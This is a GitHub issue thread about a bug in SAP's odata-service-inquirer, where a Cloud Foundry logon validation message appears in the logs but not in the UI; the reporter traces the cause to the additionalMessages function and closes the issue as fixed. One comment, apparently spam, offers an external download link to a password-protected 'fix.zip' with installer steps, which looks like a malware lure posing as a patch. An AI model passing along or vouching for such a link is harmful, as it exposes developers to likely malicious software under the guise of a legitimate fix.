### ISSUE TITLE
BUG - odata-service-inquirer: CF logon validation message not shown

### ISSUE THREAD

**Issue by IainSAP** [SAP/open-ux-tools#2290]
### Description

Selecting the CF Discovery datasource from odata-service-inquirer prompts shoudl list all CF discovered Abapa services when the user is logged on to CF. If the user is not logged on then a message should be shown to indicate that they need to logon. While the logs show the message, the message is not shown in YUI. 

<img width="1257" alt="image" src="https://github.com/user-attachments/assets/a03c8e91-22df-4508-b204-1517510927fc">

Note: It appears that the `additionalMessages` func only executes when the validator returns true. Fix is to move the message to the validator.

### Screenshots
If applicable, add screenshots to help explain the problem.

#### Version/Components/Environment	
Add any other context about the problem here
OS:                      
- [ ] Mac OS
- [ ] Windows
- [ ] Other

### Problem
{describe the problem} 

### Fix
{describe the fix} 

### Why was it missed
{Some explanation why this issue might have been missed during normal development/testing cycle}  

### How can we avoid this
{if we don’t want to see this type of issues anymore what we should do to prevent}

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IainSAP** [comment]
Fixed
